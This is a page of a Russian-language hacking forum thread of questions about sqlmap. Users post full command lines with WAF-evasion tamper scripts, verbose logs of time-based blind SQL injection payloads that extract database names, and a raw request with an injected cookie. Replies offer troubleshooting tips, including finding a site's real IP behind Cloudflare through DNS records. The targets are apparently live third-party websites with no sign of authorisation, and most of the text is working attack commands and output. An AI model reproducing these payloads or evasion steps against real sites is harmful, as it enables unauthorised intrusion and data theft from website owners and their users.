HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 111 из 115 « Первая < 1161101 107 108 109 110 111 112 113 114 115 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1101  
Старый 15.02.2021, 20:31
F1shka
Banned
Регистрация: 10.04.2008
Сообщений: 618
Провел на форуме:
2603997

Репутация: 942


Отправить сообщение для F1shka с помощью ICQ Отправить сообщение для F1shka с помощью AIM Отправить сообщение для F1shka с помощью Yahoo
По умолчанию
Цитата:
Сообщение от None  
[12:51:44] [DEBUG] used the default behavior, running in batch mode
Параметры с которыми запускаешь SQLMAP? Параметр --batch всегда жмет за тебя Y, --charset=utf-8 присваивает кодировку в UTF-8. Попробуй так:

Код:
Code:
sqlmap -u http://site[.]ru/ --batch --charset=utf-8 --threads=10 --risk=3 --level=5 --dbs --random-agent --hex
 
Ответить с цитированием

  #1102  
Старый 19.02.2021, 20:33
Duble
Guest
Сообщений: n/a
Провел на форуме:
15943

Репутация: 0
По умолчанию
Код:
Code:
[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times
[*] ending @ 19:29:32 /2021-02-19/
В чем проблема?

Код:
Code:
--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only
До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.

Подскажите как быть?



Не обнаруживает базы данных
 
Ответить с цитированием

  #1103  
Старый 20.02.2021, 20:26
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию
Цитата:
Сообщение от Duble  
Duble said:

Код:
Code:
[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times
[*] ending @ 19:29:32 /2021-02-19/
В чем проблема?
Код:
Code:
--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only
До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
Подскажите как быть?

Не обнаруживает базы данных

Теперь ищи реальный ИП сайта.Смотри DNS записи
 
Ответить с цитированием

  #1104  
Старый 01.03.2021, 05:26
polzunki
Guest
Сообщений: n/a
Провел на форуме:
7210

Репутация: 0
По умолчанию
Здравствуйте. Есть ссылка вида: http://site.com/index.php?id=image/q...w&host_id=2352

При запуске этой команды:

Код:
Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352"  --proxy-file=C:\proxy.txt  --threads=10 --timeout=180  --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment,space2hash,space2mysqlblank" --level 5 --risk 3 --dbs
Тамперы подставляются к image/quickview

Возможно ли как-то указать мапе, чтобы проверка шла черезhost_id=2352?
 
Ответить с цитированием

  #1105  
Старый 01.03.2021, 08:20
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
@polzunki

* - указатель точки инъекции

Код:
Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah
 
Ответить с цитированием

  #1106  
Старый 01.03.2021, 11:48
polzunki
Guest
Сообщений: n/a
Провел на форуме:
7210

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

@polzunki
* - указатель точки инъекции
Код:
Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah

Благодарю. Вроде получилось, но по итогу получаю это:



URI parameter '#1*' is not injectable


Откуда берётся #1, если этого нет в таргете?
 
Ответить с цитированием

  #1107  
Старый 01.03.2021, 12:01
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от polzunki  
polzunki said:

Откуда берётся #1, если этого нет в таргете?
это означает, что в указанном параметре под номером 1 нет инъекции, то есть с помощью * можно указывать несколько параметров.

а если вы хотите увидеть, что отправляется в запросах, то добавьте ключ -v- Уровень вербальности: 1-6 (по умолчанию 1)

но лучше начните с мануала программы ( он есть и на русском ) или даже с этого!
 
Ответить с цитированием

  #1108  
Старый 01.03.2021, 15:58
Duble
Guest
Сообщений: n/a
Провел на форуме:
15943

Репутация: 0
По умолчанию
Cорян за возможно глупый вопрос, просто не сталкивался со скулей в куках.

Как правильно кормить мапу?

Цитата:
Сообщение от None  
content_copyGET /pr/110 HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Cookie: __cfduid=d98d5bb0d7fe33de10e5507d3ab069d8f16145126 99;PHPSESSID=duh4mooe1nue85unesnfmpdir5;nova=hryhv dn5lco00000000000000000000;cf_ob_info=520:628a0e9e 19008b4a:KBP'%20RLIKE%20(SELECT%20(CASE%20WHEN%20( 1%2B1-2%2B000610=2%2B2-4%2B000610)%20THEN%201%20ELSE%200x28%20END))%20--%20;cf_use_ob=0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: site.com
Connection: Keep-alive
 
Ответить с цитированием

  #1109  
Старый 07.03.2021, 15:10
Duble
Guest
Сообщений: n/a
Провел на форуме:
15943

Репутация: 0
По умолчанию
Подскажите в чем проблема?

Цитата:
Сообщение от None  
sqlmap --level 5 --risk 3 --random-agent --threads 1 --url "
https://site.su/ajax/ajax.php
" --batch --time-sec=400 -v 3 --hex --data="arr[hours]=19&arr[id_film]=10166*&arr[minutes]=44&
method=1.32" --tamper=space2comment,randomcase --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.3.2#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:04:44 /2021-03-07/
[13:04:44] [DEBUG] cleaning up configuration parameters
[13:04:45] [INFO] loading tamper module 'space2comment'
[13:04:45] [INFO] loading tamper module 'randomcase'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[13:04:45] [DEBUG] used the default behavior, running in batch mode
[13:04:45] [INFO] loading tamper module 'space2dash'
[13:04:45] [DEBUG] setting the HTTP timeout
[13:04:45] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (Windows NT 5.0; U; en)' from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [DEBUG] creating HTTP requests opener object
[13:04:46] [DEBUG] setting the HTTP Referer header to the target URL
[13:04:46] [DEBUG] setting the HTTP Host header to the target URL
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[13:04:46] [DEBUG] used the default behavior, running in batch mode
[13:04:47] [INFO] resuming back-end DBMS 'mysql'
[13:04:47] [DEBUG] resolving hostname 'site.su'
[13:04:48] [INFO] testing connection to the target URL
[13:04:52] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: arr[hours]=19&arr[id_film]=10166' AND SLEEP(400) AND 'kNCw'='kNCw&arr[minutes]=44&method=1.32
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:04:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.16.1, PHP 7.3.16
back-end DBMS: MySQL >= 5.0.12
[13:04:52] [INFO] fetching database names
[13:04:52] [INFO] fetching number of databases
[13:04:52] [PAYLOAD] 10166
[13:04:53] [INFO] resumed: ?\xff
[13:04:53] [DEBUG] performed 0 queries in 0.03 seconds
[13:04:53] [ERROR] unable to retrieve the number of databases
[13:04:53] [INFO] falling back to current database
[13:04:53] [INFO] fetching current database
[13:04:53] [PAYLOAD] 10166'/**/aND/**/7166=If((orD(Mid((heX(IfNULL(cAsT(DAtABAsE()/**/As/**/CHaR),0x20))),1,1))>66),SLEEp(400),7166)/**/aND/**/'TrEu'='TrEu
[13:04:53] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[13:05:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:05:21] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRd(MId((HeX(iFNULL(caSt(DATAbAsE()/**/aS/**/chAR),0x20))),1,1))>52),sLEEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:05:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[13:05:51] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(CAst(DAtAbAse()/**/As/**/ChaR),0x20))),1,1))>56),sleEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:06:22] [PAYLOAD] 10166'/**/And/**/7166=iF((oRD(mID((Hex(iFNULL(caST(daTabaSe()/**/As/**/CHaR),0x20))),1,1))>64),slEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:06:54] [PAYLOAD] 10166'/**/aNd/**/7166=iF((orD(miD((hEX(iFNULL(CAsT(daTAbase()/**/aS/**/ChaR),0x20))),1,1))>65),SleEp(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:07:24] [PAYLOAD] 10166'/**/aND/**/7166=iF((Ord(Mid((hEx(iFNULL(caSt(daTABaSE()/**/aS/**/Char),0x20))),1,1))!=66),SleeP(400),7166)/**/aND/**/'TrEu'='TrEu
[13:07:58] [ERROR] invalid character detected. retrying..
[13:07:58] [PAYLOAD] 10166'/**/aNd/**/7166=iF((Ord(MId((Hex(iFNULL(CAst(DatAbaSE()/**/aS/**/cHAR),0x20))),1,1))>66),SleEP(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:08:32] [PAYLOAD] 10166'/**/And/**/7166=iF((ORd(mId((Hex(iFNULL(cAst(databaSE()/**/As/**/cHAr),0x20))),1,1))>97),sLEEp(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:12] [PAYLOAD] 10166'/**/And/**/7166=If((Ord(MiD((heX(IfNULL(CAst(DataBAsE()/**/As/**/ChAR),0x20))),1,1))>101),SlEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:43] [PAYLOAD] 10166'/**/And/**/7166=If((oRd(MId((hEx(IfNULL(casT(dAtabAse()/**/As/**/cHAR),0x20))),1,1))>119),slEEP(400),7166)/**/And/**/'TrEu'='TrEu
[13:10:14] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(caST(dAtABasE()/**/aS/**/ChAr),0x20))),1,1))>120),sLeEP(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:10:44] [INFO] retrieved:
[13:10:44] [DEBUG] performed 11 queries in 351.53 seconds
[13:10:44] [CRITICAL] unable to retrieve the database names[*] ending @ 13:10:44 /2021-03-07/
 
Ответить с цитированием

  #1110  
Старый 07.03.2021, 15:45
d_dwacawaca
Guest
Сообщений: n/a
Провел на форуме:
7581

Репутация: 0
По умолчанию
Цитата:
Сообщение от Duble  
Duble said:

Подскажите в чем проблема?
Сделай логирование в файл ( -t logfile.txt) и руками проверь запросы, может WAF на database() срабатывает
 
Ответить с цитированием
Ответ
Страница 111 из 115 « Первая < 1161101 107 108 109 110 111 112 113 114 115 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ